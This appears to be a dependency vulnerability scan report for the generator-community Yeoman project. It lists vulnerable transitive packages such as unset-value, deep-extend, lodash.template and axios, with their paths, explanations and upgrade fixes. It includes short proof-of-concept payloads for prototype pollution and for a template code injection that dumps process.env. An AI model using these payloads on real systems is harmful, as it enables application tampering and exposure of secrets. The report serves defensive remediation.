  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 braces@2.3.2 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 globby@8.0.2 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 nanomatch@1.2.13 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 fast-glob@2.2.7 micromatch@3.1.10 extglob@2.0.4 expand-brackets@2.1.4 snapdragon@0.8.2 base@0.11.2 cache-base@1.0.1 unset-value@1.0.0

Overview

Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade unset-value to version 2.0.1 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: deep-extend
  • Introduced through: yeoman-generator@2.0.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 deep-extend@0.4.2
    Remediation: Upgrade to yeoman-generator@2.0.5.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 deep-extend@0.4.2
    Remediation: Upgrade to generator-license@5.2.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 deep-extend@0.4.2
    Remediation: Upgrade to generator-node@2.4.0.

Overview

deep-extend is a library for Recursive object extending.

Affected versions of this package are vulnerable to Prototype Pollution. Utilities function in all the listed modules can be tricked into modifying the prototype of "Object" when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.

PoC by HoLyVieR

var merge = require('deep-extend');
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade deep-extend to version 0.5.1 or higher.

References

high severity

Authorization Bypass Through User-Controlled Key

  • Vulnerable module: parse-path
  • Introduced through: git-url-parse@7.0.1

Detailed paths

  • Introduced through: generator-community@commonality/generator-community git-url-parse@7.0.1 git-up@2.1.0 parse-url@3.0.2 parse-path@3.0.4
    Remediation: Upgrade to git-url-parse@11.0.0.

Overview

parse-path is a Parse paths (local paths, urls: ssh/git/etc)

Affected versions of this package are vulnerable to Authorization Bypass Through User-Controlled Key which is unable to detect the right resource.

Remediation

Upgrade parse-path to version 5.0.0 or higher.

References

high severity

Code Injection

  • Vulnerable module: lodash.template
  • Introduced through: markdown-magic@0.1.18

Detailed paths

  • Introduced through: generator-community@commonality/generator-community markdown-magic@0.1.18 markdown-toc@1.2.0 remarkable@1.7.4 autolinker@0.28.1 gulp-header@1.8.12 lodash.template@4.18.1

Overview

lodash.template is a The Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Code Injection due the improper validation of options.variable key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.

References

high severity

Cross-site Request Forgery (CSRF)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to inserting the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in all requests to any server when the XSRF-TOKEN0 cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.

Workaround

Users should change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.

Remediation

Upgrade axios to version 0.28.0, 1.6.0 or higher.

References

high severity

Improper Privilege Management

  • Vulnerable module: shelljs
  • Introduced through: yeoman-generator@2.0.0, generator-license@5.1.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 shelljs@0.7.8
    Remediation: Upgrade to yeoman-generator@2.0.3.
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 shelljs@0.7.8
    Remediation: Upgrade to generator-license@5.2.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 shelljs@0.7.8
    Remediation: Upgrade to generator-node@2.4.0.

Overview

shelljs is a wrapper for the Unix shell commands for Node.js.

Affected versions of this package are vulnerable to Improper Privilege Management. When ShellJS is used to create shell scripts which may be running as root, users with low-level privileges on the system can leak sensitive information such as passwords (depending on implementation) from the standard output of the privileged process OR shutdown privileged ShellJS processes via the exec function when triggering EACCESS errors.

Note: Thi only impacts the synchronous version of shell.exec().

Remediation

Upgrade shelljs to version 0.8.5 or higher.

References

high severity

HTTP Response Splitting

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to HTTP Response Splitting via the parseTokens header processing path in lib/core/AxiosHeaders.js. An attacker can smuggle HTTP requests or inject arbitrary headers by supplying a header value containing \r\n, which Axios merges into an outbound request. Under specific conditions, this can be used to exfiltrate cloud metadata tokens, pivot into internal services, or poison downstream HTTP traffic.

Notes

  • Exploitation requires prior successful prototype pollution in a third-party dependency, enabling attacker-controlled header data to flow into Axios via configuration merging or AxiosHeaders.set(...).
  • IMDSv2 token exfiltration (described in the original vulnerability report as another step in the exploit chain following the smuggling of a PUT request) further depends on the application running in an AWS environment with instance metadata access enabled, and on the Axios process having network access to the metadata endpoint.
  • A possible but uncommon vector mentioned in the maintainers' advisory relies on the use of a non standard Axios transport mechanism, e.g. a custom adapter, to bypass Node.js header validation, thereby permitting malformed or injected header values to be transmitted without rejection. In most cases, this vector is blocked by Node.JS's built in header validation.

Remediation

Upgrade axios to version 0.31.0, 1.15.0 or higher.

References

high severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution through the config.proxy property in the HTTP adapter, which accesses properties via the prototype chain. An attacker can intercept and modify all HTTP requests and responses, including sensitive authentication credentials, by polluting the Object.prototype with a malicious proxy object. This allows the attacker to route all HTTP traffic through a proxy server under their control, enabling full visibility and manipulation of data in transit.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
